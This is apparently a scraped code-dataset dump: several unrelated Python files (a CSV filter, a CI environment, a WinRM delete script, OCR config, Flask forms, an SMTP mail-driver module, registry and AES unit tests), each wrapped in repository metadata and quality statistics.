| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d9f9cd4e7a0b73e79eb71d2bdbfa755d69a9cc9d
| 597
|
py
|
Python
|
examples/first_char_last_column.py
|
clarkfitzg/sta141c
|
129704ba0952a4b80f9b093dcfa49f49f37b052d
|
[
"MIT"
] | 24
|
2019-01-08T20:10:11.000Z
|
2021-11-26T12:18:58.000Z
|
examples/first_char_last_column.py
|
timilchene/sta141c-winter19
|
129704ba0952a4b80f9b093dcfa49f49f37b052d
|
[
"MIT"
] | 1
|
2017-06-25T05:35:24.000Z
|
2017-06-25T05:35:24.000Z
|
examples/first_char_last_column.py
|
timilchene/sta141c-winter19
|
129704ba0952a4b80f9b093dcfa49f49f37b052d
|
[
"MIT"
] | 22
|
2019-01-08T20:02:15.000Z
|
2021-12-16T23:27:56.000Z
|
#!/usr/bin/env python3
"""
For the last column, print only the first character.
Usage:
$ printf "100,200\n0,\n" | python3 first_char_last_column.py
Should print "100,2\n0,"
"""
import csv
from sys import stdin, stdout
def main():
reader = csv.reader(stdin)
writer = csv.writer(stdout)
for row in reader:
try:
row[-1] = row[-1][0]
except IndexError:
# Python: Better to ask forgiveness than permission
# Alternative: Look before you leap
pass
writer.writerow(row)
if __name__ == "__main__":
main()
| 19.258065
| 64
| 0.606365
| 79
| 597
| 4.443038
| 0.696203
| 0.05698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.03972
| 0.283082
| 597
| 30
| 65
| 19.9
| 0.780374
| 0.425461
| 0
| 0
| 0
| 0
| 0.024242
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.076923
| 0.153846
| 0
| 0.230769
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d9fb744315858b3e553e097f0866c6de49262adf
| 1,996
|
py
|
Python
|
env_ci.py
|
reloadware/stickybeak
|
8ac52a80849a3098fb6b2f47115970a734a73c14
|
[
"Apache-2.0"
] | null | null | null |
env_ci.py
|
reloadware/stickybeak
|
8ac52a80849a3098fb6b2f47115970a734a73c14
|
[
"Apache-2.0"
] | null | null | null |
env_ci.py
|
reloadware/stickybeak
|
8ac52a80849a3098fb6b2f47115970a734a73c14
|
[
"Apache-2.0"
] | 1
|
2022-01-01T15:14:42.000Z
|
2022-01-01T15:14:42.000Z
|
from pathlib import Path
root = Path(__file__).parent.absolute()
import envo
envo.add_source_roots([root])
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
from envo import Env, Namespace, env_var, logger, run
from env_comm import StickybeakCommEnv as ParentEnv
p = Namespace("p")
class StickybeakCiEnv(ParentEnv):
class Meta(ParentEnv.Meta):
stage: str = "ci"
emoji: str = "⚙"
load_env_vars = True
class Environ(ParentEnv.Environ):
pypi_username: Optional[str] = env_var(raw=True)
pypi_password: Optional[str] = env_var(raw=True)
e: Environ
def init(self) -> None:
super().init()
@p.command
def bootstrap(self, test_apps=True) -> None:
super().bootstrap(test_apps)
@p.command
def test(self) -> None:
run("pytest --reruns 2 -v tests")
@p.command
def build(self) -> None:
run("poetry build")
@p.command
def publish(self) -> None:
run(f'poetry publish --username "{self.e.pypi_username}" --password "{self.e.pypi_password}"', verbose=False)
@p.command
def rstcheck(self) -> None:
pass
# run("rstcheck README.rst | tee ./workspace/rstcheck.txt")
@p.command
def flake(self) -> None:
pass
# run("flake8 . | tee ./workspace/flake8.txt")
@p.command
def check_black(self) -> None:
run("black --check .")
@p.command
def check_isort(self) -> None:
run("black --check .")
@p.command
def mypy(self) -> None:
pass
run("mypy .")
@p.command
def generate_version(self) -> None:
import toml
config = toml.load(str(self.meta.root / "pyproject.toml"))
version: str = config["tool"]["poetry"]["version"]
version_file = self.meta.root / "stickybeak/__version__.py"
Path(version_file).touch()
version_file.write_text(f'__version__ = "{version}"\n')
ThisEnv = StickybeakCiEnv
| 22.942529
| 117
| 0.613727
| 251
| 1,996
| 4.752988
| 0.36255
| 0.067058
| 0.092205
| 0.03772
| 0.093881
| 0.093881
| 0.053646
| 0.053646
| 0
| 0
| 0
| 0.002003
| 0.249499
| 1,996
| 86
| 118
| 23.209302
| 0.793725
| 0.051102
| 0
| 0.298246
| 0
| 0
| 0.130619
| 0.038604
| 0
| 0
| 0
| 0
| 0
| 1
| 0.192982
| false
| 0.087719
| 0.122807
| 0
| 0.385965
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a29eefe067ae42942e4915562e64419af3d1cde
| 950
|
py
|
Python
|
scripts_python3/exchange/deleteExchange.py
|
bcvsolutions/winrm-ad-connector
|
9b45dae78d3ba24fe6b00e090f8763d3162e1570
|
[
"Apache-2.0"
] | null | null | null |
scripts_python3/exchange/deleteExchange.py
|
bcvsolutions/winrm-ad-connector
|
9b45dae78d3ba24fe6b00e090f8763d3162e1570
|
[
"Apache-2.0"
] | 2
|
2020-05-27T07:15:28.000Z
|
2020-12-17T05:22:54.000Z
|
scripts_python3/exchange/deleteExchange.py
|
bcvsolutions/winrm-ad-connector
|
9b45dae78d3ba24fe6b00e090f8763d3162e1570
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# All params from IdM is stored in environment and you can get them by os.environ["paramName"]
import sys, os
# this is needed for importing file winrm_wrapper from parent dir
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import winrm_wrapper
import codecs
uid = os.environ["__UID__"]
winrm_wrapper.writeLog("Delete start for " + uid)
# Load PS script from file and replace params
winrm_wrapper.writeLog("loading script")
f = codecs.open(os.environ["script"], encoding='utf-8', mode='r')
command = f.read()
command = command.replace("$uid", uid)
# Call wrapper
winrm_wrapper.executeScript(os.environ["endpoint"], os.environ["authentication"], os.environ["user"],
os.environ["password"], os.environ["caTrustPath"], os.environ["ignoreCaValidation"], command, uid)
winrm_wrapper.writeLog("Delete end for " + uid)
print("__UID__=" + uid)
sys.exit()
| 35.185185
| 134
| 0.705263
| 133
| 950
| 4.902256
| 0.503759
| 0.124233
| 0.092025
| 0.070552
| 0.088957
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00369
| 0.144211
| 950
| 26
| 135
| 36.538462
| 0.798278
| 0.270526
| 0
| 0
| 0
| 0
| 0.206696
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.2
| 0
| 0.2
| 0.066667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a2ac410faa6645af8d41c21c8f5834684cf1a20
| 2,152
|
py
|
Python
|
tests/registry_test.py
|
Walon1998/dace
|
95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T13:36:34.000Z
|
2022-03-11T13:36:34.000Z
|
tests/registry_test.py
|
Walon1998/dace
|
95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0
|
[
"BSD-3-Clause"
] | null | null | null |
tests/registry_test.py
|
Walon1998/dace
|
95ddfd3e9a5c654f0f0d66d026e0b64ec0f028a0
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2019-2021 ETH Zurich and the DaCe authors. All rights reserved.
import unittest
from aenum import Enum, auto
from dace import registry
@registry.make_registry
class ExtensibleClass(object):
pass
class Extension(ExtensibleClass):
pass
@registry.extensible_enum
class ExtensibleEnumeration(Enum):
a = auto()
b = auto()
class RegistryTests(unittest.TestCase):
def test_class_registry(self):
ExtensibleClass.register(Extension)
self.assertTrue(Extension in ExtensibleClass.extensions())
ExtensibleClass.unregister(Extension)
self.assertTrue(Extension not in ExtensibleClass.extensions())
def test_autoregister(self):
@registry.autoregister
class Extension2(ExtensibleClass):
pass
self.assertTrue(Extension2 in ExtensibleClass.extensions())
def test_class_registry_args(self):
ExtensibleClass.register(Extension, a=True, b=1, c=2)
self.assertTrue(Extension in ExtensibleClass.extensions())
self.assertEqual(ExtensibleClass.extensions()[Extension], dict(a=True, b=1, c=2))
ExtensibleClass.unregister(Extension)
self.assertTrue(Extension not in ExtensibleClass.extensions())
def test_autoregister_args(self):
@registry.autoregister_params(a=False, b=0)
class Extension3(ExtensibleClass):
pass
self.assertTrue(Extension3 in ExtensibleClass.extensions())
self.assertEqual(ExtensibleClass.extensions()[Extension3], dict(a=False, b=0))
def test_autoregister_fail(self):
with self.assertRaises(TypeError):
@registry.autoregister
class Extension4(object):
pass
def test_enum_registry(self):
ExtensibleEnumeration.register('c')
self.assertTrue(ExtensibleEnumeration.c in ExtensibleEnumeration)
self.assertEqual(ExtensibleEnumeration.c.value, 3)
def test_enum_registry_fail(self):
with self.assertRaises(TypeError):
@registry.extensible_enum
class NotAnEnum(object):
pass
if __name__ == '__main__':
unittest.main()
| 29.479452
| 89
| 0.697955
| 220
| 2,152
| 6.704545
| 0.290909
| 0.135593
| 0.109831
| 0.065085
| 0.380339
| 0.357288
| 0.295593
| 0.143729
| 0.143729
| 0.143729
| 0
| 0.012419
| 0.214219
| 2,152
| 72
| 90
| 29.888889
| 0.859846
| 0.033922
| 0
| 0.352941
| 0
| 0
| 0.004333
| 0
| 0
| 0
| 0
| 0
| 0.235294
| 1
| 0.137255
| false
| 0.117647
| 0.058824
| 0
| 0.392157
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a3245f4587a32c402e78f398ab94bc52ef0cf9a
| 780
|
py
|
Python
|
PaddleOCR/deploy/hubserving/ocr_det/params.py
|
TangJiamin/Ultra_light_OCR_No.23
|
594aa286dc2f88614141838ce45c164647226cdb
|
[
"Apache-2.0"
] | null | null | null |
PaddleOCR/deploy/hubserving/ocr_det/params.py
|
TangJiamin/Ultra_light_OCR_No.23
|
594aa286dc2f88614141838ce45c164647226cdb
|
[
"Apache-2.0"
] | null | null | null |
PaddleOCR/deploy/hubserving/ocr_det/params.py
|
TangJiamin/Ultra_light_OCR_No.23
|
594aa286dc2f88614141838ce45c164647226cdb
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class Config(object):
pass
def read_params():
cfg = Config()
#params for text detector
cfg.det_algorithm = "DB"
cfg.det_model_dir = "./inference/ch_ppocr_mobile_v2.0_det_infer/"
cfg.det_limit_side_len = 960
cfg.det_limit_type = 'max'
#DB parmas
cfg.det_db_thresh = 0.3
cfg.det_db_box_thresh = 0.5
cfg.det_db_unclip_ratio = 1.6
cfg.use_dilation = False
# #EAST parmas
# cfg.det_east_score_thresh = 0.8
# cfg.det_east_cover_thresh = 0.1
# cfg.det_east_nms_thresh = 0.2
cfg.use_pdserving = False
cfg.use_tensorrt = False
return cfg
| 22.285714
| 70
| 0.661538
| 116
| 780
| 4.034483
| 0.508621
| 0.128205
| 0.102564
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030822
| 0.251282
| 780
| 34
| 71
| 22.941176
| 0.770548
| 0.203846
| 0
| 0
| 0
| 0
| 0.083045
| 0.074394
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.055556
| 0.166667
| 0
| 0.333333
| 0.055556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a455ca53b609476797038c96b21d969bbdf51e3
| 2,234
|
py
|
Python
|
bookshelf/main/forms.py
|
thewordisbird/bookshelf
|
5166720bdc0dbffedc14b71b0f75ad78dc69b465
|
[
"MIT"
] | null | null | null |
bookshelf/main/forms.py
|
thewordisbird/bookshelf
|
5166720bdc0dbffedc14b71b0f75ad78dc69b465
|
[
"MIT"
] | null | null | null |
bookshelf/main/forms.py
|
thewordisbird/bookshelf
|
5166720bdc0dbffedc14b71b0f75ad78dc69b465
|
[
"MIT"
] | null | null | null |
import datetime
from flask_wtf import FlaskForm
from wtforms import (
StringField,
TextAreaField,
DateTimeField,
HiddenField,
PasswordField,
)
from wtforms.validators import DataRequired, ValidationError, Email, EqualTo
class NullableDateTimeField(DateTimeField):
"""Modify DateField to allow for Null values"""
def process_formdata(self, valuelist):
# Bypasses wtForms validation for blank datetime field.
if valuelist:
date_str = " ".join(valuelist).strip()
if date_str == "":
self.data = None
return
try:
self.data = datetime.datetime.strptime(date_str, self.format)
except ValueError:
self.data = None
raise ValueError(self.gettext("Not a valid date value"))
class SearchForm(FlaskForm):
search = StringField("Search", validators=[DataRequired()])
class ReviewForm(FlaskForm):
rating = HiddenField("Rating", validators=[DataRequired()])
review_title = StringField("Headline")
review_content = TextAreaField("Review")
date_started = NullableDateTimeField("Date Started", format="%m/%d/%Y")
date_finished = NullableDateTimeField("Date Finished", format="%m/%d/%Y")
def validate_date_finished(self, date_finished):
if self.date_started.data and date_finished.data:
if self.date_started.data > date_finished.data:
print("Date finished must be greater than or equal to date started")
raise ValidationError(
"Date finished must be greater than or equal to date started."
)
elif self.date_started.data or date_finished.data:
print("missing date")
raise ValidationError("If setting read dates, both dates are required.")
class EditProfileForm(FlaskForm):
display_name = StringField("Name", validators=[])
email = StringField("Email", validators=[Email(message="Invalid Email Address.")])
password = PasswordField(
"Password",
validators=[EqualTo("confirm_password", message="Passwords must match.")],
)
confirm_password = PasswordField("Confirm Password", validators=[])
| 36.032258
| 86
| 0.658013
| 230
| 2,234
| 6.3
| 0.408696
| 0.074534
| 0.031056
| 0.039337
| 0.096618
| 0.067633
| 0.067633
| 0.067633
| 0.067633
| 0.067633
| 0
| 0
| 0.243957
| 2,234
| 61
| 87
| 36.622951
| 0.857904
| 0.042972
| 0
| 0.041667
| 0
| 0
| 0.168856
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0.104167
| 0.083333
| 0
| 0.4375
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
8a84ca10fd051b6b0bb8be0088246cc71958f9d5
| 12,062
|
py
|
Python
|
oase-root/web_app/views/system/mail/action_mail.py
|
Masa-Yasuno/oase
|
90f3cee73c0d9b3153808a4a72bd19984a4873f9
|
[
"Apache-2.0"
] | 9
|
2020-03-25T07:51:47.000Z
|
2022-02-07T00:07:28.000Z
|
oase-root/web_app/views/system/mail/action_mail.py
|
Masa-Yasuno/oase
|
90f3cee73c0d9b3153808a4a72bd19984a4873f9
|
[
"Apache-2.0"
] | 1,164
|
2021-01-28T23:16:11.000Z
|
2022-03-28T07:23:10.000Z
|
oase-root/web_app/views/system/mail/action_mail.py
|
Masa-Yasuno/oase
|
90f3cee73c0d9b3153808a4a72bd19984a4873f9
|
[
"Apache-2.0"
] | 25
|
2020-03-17T06:48:30.000Z
|
2022-02-15T15:13:44.000Z
|
# Copyright 2019 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
[概要]
MAILアクション用画面表示補助クラス
"""
import pytz
import datetime
import json
import socket
import traceback
from django.http import HttpResponse
from django.http import HttpResponseServerError
from django.db import transaction
from django.conf import settings
from libs.commonlibs import define as defs
from libs.commonlibs.oase_logger import OaseLogger
from libs.commonlibs.aes_cipher import AESCipher
from web_app.models.models import ActionType
from web_app.models.mail_models import MailDriver
from web_app.templatetags.common import get_message
from web_app.serializers.unicode_check import UnicodeCheck
logger = OaseLogger.get_instance() # ロガー初期化
class mailDriverInfo():
def __init__(self, drv_id, act_id, name, ver, icon_name):
self.drv_id = drv_id
self.act_id = act_id
self.name = name
self.ver = ver
self.icon_name = icon_name
def __str__(self):
return '%s(ver%s)' % (self.name, self.ver)
def get_driver_name(self):
return '%s Driver ver%s' % (self.name, self.ver)
def get_driver_id(self):
return self.drv_id
def get_icon_name(self):
return self.icon_name
@classmethod
def get_template_file(cls):
return 'system/mail/action_mail.html'
@classmethod
def get_info_list(cls, user_groups):
try:
mail_driver_obj_list = MailDriver.objects.all()
except Exception as e:
# ここでの例外は大外で拾う
raise
protocol_dict = cls.get_define()['dict']
mail_driver_dto_list = []
cipher = AESCipher(settings.AES_KEY)
for mail_obj in mail_driver_obj_list:
mail_info = mail_obj.__dict__
if mail_obj.password:
mail_info['password'] = cipher.decrypt(mail_obj.password)
mail_info['protocol_str'] = protocol_dict[mail_obj.protocol]
mail_driver_dto_list.append(mail_info)
return mail_driver_dto_list
@classmethod
def get_group_list(cls, user_groups):
"""
[概要]
グループ一覧を取得する(システム管理グループを除く)
"""
return []
@classmethod
def get_define(cls):
protocol_dict = {key_value['v']: key_value['k'] for key_value in defs.SMTP_PROTOCOL.LIST_ALL}
defines = {
'list_all': defs.SMTP_PROTOCOL.LIST_ALL,
'dict': protocol_dict,
}
return defines
def record_lock(self, json_str, request):
logger.logic_log('LOSI00001', 'None', request=request)
driver_id = self.get_driver_id()
# 更新前にレコードロック
if json_str['json_str']['ope'] in (defs.DABASE_OPECODE.OPE_UPDATE, defs.DABASE_OPECODE.OPE_DELETE):
drvinfo_modify = int(json_str['json_str']['mail_driver_id'])
MailDriver.objects.select_for_update().filter(pk=drvinfo_modify)
logger.logic_log('LOSI00002', 'Record locked.(driver_id=%s)' % driver_id, request=request)
def modify(self, json_str, request):
"""
[メソッド概要]
グループのDB更新処理
"""
logger.logic_log('LOSI00001', 'None', request=request)
error_flag = False
error_msg = {
'mail_disp_name' : '',
'protocol' : '',
'smtp_server' : '',
'port' : '',
'user' : '',
'password' : '',
}
now = datetime.datetime.now(pytz.timezone('UTC'))
emo_chk = UnicodeCheck()
# 成功時データ
response = {"status": "success",}
try:
rq = json_str['json_str']
ope = int(rq['ope'])
#削除以外の場合の入力チェック
if ope != defs.DABASE_OPECODE.OPE_DELETE:
error_flag = self._validate(rq, error_msg, request)
if error_flag:
raise UserWarning('validation error.')
# パスワードを暗号化 空なら空文字
cipher = AESCipher(settings.AES_KEY)
if ope == defs.DABASE_OPECODE.OPE_UPDATE:
encrypted_password = cipher.encrypt(rq['password']) if rq['password'] else ''
driver_info_mod = MailDriver.objects.get(mail_driver_id=rq['mail_driver_id'])
driver_info_mod.mail_disp_name = rq['mail_disp_name']
driver_info_mod.protocol = rq['protocol']
driver_info_mod.smtp_server = rq['smtp_server']
driver_info_mod.port = rq['port']
driver_info_mod.user = rq['user']
driver_info_mod.password = encrypted_password
driver_info_mod.last_update_user = request.user.user_name
driver_info_mod.last_update_timestamp = now
driver_info_mod.save(force_update=True)
elif ope == defs.DABASE_OPECODE.OPE_DELETE:
MailDriver.objects.filter(pk=rq['mail_driver_id']).delete()
elif ope == defs.DABASE_OPECODE.OPE_INSERT:
encrypted_password = cipher.encrypt(rq['password']) if rq['password'] else ''
driver_info_reg = MailDriver(
mail_disp_name = rq['mail_disp_name'],
protocol = rq['protocol'],
smtp_server = rq['smtp_server'],
port = rq['port'],
user = rq['user'],
password = encrypted_password,
last_update_user = request.user.user_name,
last_update_timestamp = now
).save(force_insert=True)
except MailDriver.DoesNotExist:
logger.logic_log('LOSM07006', "mail_driver_id", mail_driver_id, request=request)
except Exception as e:
logger.logic_log('LOSI00005', traceback.format_exc(), request=request)
response = {
'status': 'failure',
'error_msg': error_msg, # エラー詳細(エラーアイコンで出す)
}
logger.logic_log('LOSI00002', 'response=%s' % response, request=request)
return response
def _validate(self, rq, error_msg, request):
"""
[概要]
入力チェック
[引数]
rq: dict リクエストされた入力データ
error_msg: dict
[戻り値]
"""
logger.logic_log('LOSI00001', 'data: %s, error_msg:%s'%(rq, error_msg))
error_flag = False
emo_chk = UnicodeCheck()
emo_flag = False
emo_flag_ita_disp_name = False
emo_flag_hostname = False
if len(rq['mail_disp_name']) == 0:
error_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27201', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'mail_disp_name', request=request)
if len(rq['mail_disp_name']) > 64:
error_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27202', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'mail_disp_name', 64, rq['mail_disp_name'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['mail_disp_name'])
if len(value_list) > 0:
error_flag = True
emo_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27216', request.user.get_lang_mode(), showMsgId=False) + '\n'
if len(rq['protocol']) == 0:
error_flag = True
error_msg['protocol'] += get_message('MOSJA27212', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'protocol', request=request)
if len(rq['protocol']) > 64:
error_flag = True
error_msg['protocol'] += get_message('MOSJA27213', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'protocol', 64, rq['protocol'], request=request)
if len(rq['smtp_server']) == 0:
error_flag = True
error_msg['smtp_server'] += get_message('MOSJA27203', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'smtp_server', request=request)
if len(rq['smtp_server']) > 128:
error_flag = True
error_msg['smtp_server'] += get_message('MOSJA27204', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'smtp_server', 64, rq['smtp_server'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['smtp_server'])
if len(value_list) > 0:
error_flag = True
error_msg['smtp_server'] += get_message('MOSJA27217', request.user.get_lang_mode(), showMsgId=False) + '\n'
if len(rq['port']) == 0:
error_flag = True
error_msg['port'] += get_message('MOSJA27205', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07001', 'port', request=request)
try:
tmp_port = int(rq['port'])
if 0 > tmp_port or tmp_port > 65535:
error_flag = True
error_msg['port'] += get_message('MOSJA27206', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07003', 'port', rq['port'], request=request)
except ValueError:
error_flag = True
error_msg['port'] += get_message('MOSJA27206', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07003', 'port', rq['port'], request=request)
if len(rq['user']) > 64:
error_flag = True
error_msg['user'] += get_message('MOSJA27207', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'user', 64, rq['user'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['user'])
if len(value_list) > 0:
error_flag = True
error_msg['user'] += get_message('MOSJA27218', request.user.get_lang_mode(), showMsgId=False) + '\n'
if len(rq['password']) > 64:
error_flag = True
error_msg['password'] += get_message('MOSJA27208', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07002', 'password', 64, rq['password'], request=request)
# 絵文字チェック
value_list = emo_chk.is_emotion(rq['password'])
if len(value_list) > 0:
error_flag = True
error_msg['password'] += get_message('MOSJA27219', request.user.get_lang_mode(), showMsgId=False) + '\n'
if not emo_flag:
duplication = MailDriver.objects.filter(mail_disp_name=rq['mail_disp_name'])
if len(duplication) == 1 and int(rq['mail_driver_id']) != duplication[0].mail_driver_id:
error_flag = True
error_msg['mail_disp_name'] += get_message('MOSJA27209', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07004', 'mail_disp_name', rq['mail_disp_name'], request=request)
if error_flag == False:
# 疎通確認
resp_code = -1
try:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
resp_code = sock.connect_ex((rq['smtp_server'], int(rq['port']))) # host名名前解決が必要/etc/hostsとか
sock.close()
except Exception as e:
pass
if resp_code != 0:
error_flag = True
#todo 仮でこのエラーは名前に入れている
error_msg['mail_disp_name'] += get_message('MOSJA27215', request.user.get_lang_mode()) + '\n'
logger.user_log('LOSM07005', rq['smtp_server'], rq['port'], request=request)
return error_flag
| 35.372434
| 122
| 0.596419
| 1,433
| 12,062
| 4.750174
| 0.193999
| 0.029382
| 0.035258
| 0.044954
| 0.418834
| 0.367563
| 0.327163
| 0.276627
| 0.240341
| 0.20332
| 0
| 0.026942
| 0.286105
| 12,062
| 340
| 123
| 35.476471
| 0.763558
| 0.072293
| 0
| 0.212963
| 0
| 0
| 0.122767
| 0.004443
| 0
| 0
| 0
| 0.002941
| 0
| 1
| 0.055556
| false
| 0.060185
| 0.074074
| 0.023148
| 0.180556
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
76d4b9d4643322713c59c30a22d968f034c3d591
| 2,361
|
py
|
Python
|
test/test_aes.py
|
haruhi-dl/haruhi-dl
|
0526e2add4c263209cad55347efa9a2dfe6c3fa6
|
[
"Unlicense"
] | 32
|
2021-01-18T03:52:17.000Z
|
2022-02-17T20:43:39.000Z
|
test/test_aes.py
|
haruhi-dl/haruhi-dl
|
0526e2add4c263209cad55347efa9a2dfe6c3fa6
|
[
"Unlicense"
] | 12
|
2021-02-06T08:12:08.000Z
|
2021-12-11T23:17:41.000Z
|
test/test_aes.py
|
haruhi-dl/haruhi-dl
|
0526e2add4c263209cad55347efa9a2dfe6c3fa6
|
[
"Unlicense"
] | 6
|
2021-01-29T16:46:31.000Z
|
2022-01-20T18:40:03.000Z
|
#!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from haruhi_dl.aes import aes_decrypt, aes_encrypt, aes_cbc_decrypt, aes_cbc_encrypt, aes_decrypt_text
from haruhi_dl.utils import bytes_to_intlist, intlist_to_bytes
import base64
# the encrypted data can be generate with 'devscripts/generate_aes_testdata.py'
class TestAES(unittest.TestCase):
def setUp(self):
self.key = self.iv = [0x20, 0x15] + 14 * [0]
self.secret_msg = b'Secret message goes here'
def test_encrypt(self):
msg = b'message'
key = list(range(16))
encrypted = aes_encrypt(bytes_to_intlist(msg), key)
decrypted = intlist_to_bytes(aes_decrypt(encrypted, key))
self.assertEqual(decrypted, msg)
def test_cbc_decrypt(self):
data = bytes_to_intlist(
b"\x97\x92+\xe5\x0b\xc3\x18\x91ky9m&\xb3\xb5@\xe6'\xc2\x96.\xc8u\x88\xab9-[\x9e|\xf1\xcd"
)
decrypted = intlist_to_bytes(aes_cbc_decrypt(data, self.key, self.iv))
self.assertEqual(decrypted.rstrip(b'\x08'), self.secret_msg)
def test_cbc_encrypt(self):
data = bytes_to_intlist(self.secret_msg)
encrypted = intlist_to_bytes(aes_cbc_encrypt(data, self.key, self.iv))
self.assertEqual(
encrypted,
b"\x97\x92+\xe5\x0b\xc3\x18\x91ky9m&\xb3\xb5@\xe6'\xc2\x96.\xc8u\x88\xab9-[\x9e|\xf1\xcd")
def test_decrypt_text(self):
password = intlist_to_bytes(self.key).decode('utf-8')
encrypted = base64.b64encode(
intlist_to_bytes(self.iv[:8])
+ b'\x17\x15\x93\xab\x8d\x80V\xcdV\xe0\t\xcdo\xc2\xa5\xd8ksM\r\xe27N\xae'
).decode('utf-8')
decrypted = (aes_decrypt_text(encrypted, password, 16))
self.assertEqual(decrypted, self.secret_msg)
password = intlist_to_bytes(self.key).decode('utf-8')
encrypted = base64.b64encode(
intlist_to_bytes(self.iv[:8])
+ b'\x0b\xe6\xa4\xd9z\x0e\xb8\xb9\xd0\xd4i_\x85\x1d\x99\x98_\xe5\x80\xe7.\xbf\xa5\x83'
).decode('utf-8')
decrypted = (aes_decrypt_text(encrypted, password, 32))
self.assertEqual(decrypted, self.secret_msg)
if __name__ == '__main__':
unittest.main()
| 36.890625
| 102
| 0.671326
| 339
| 2,361
| 4.448378
| 0.368732
| 0.047745
| 0.074271
| 0.047745
| 0.451592
| 0.351459
| 0.302387
| 0.259947
| 0.259947
| 0.193634
| 0
| 0.063158
| 0.195256
| 2,361
| 63
| 103
| 37.47619
| 0.730526
| 0.051249
| 0
| 0.212766
| 0
| 0.085106
| 0.171658
| 0.143496
| 0
| 0
| 0.003576
| 0
| 0.106383
| 1
| 0.106383
| false
| 0.085106
| 0.148936
| 0
| 0.276596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
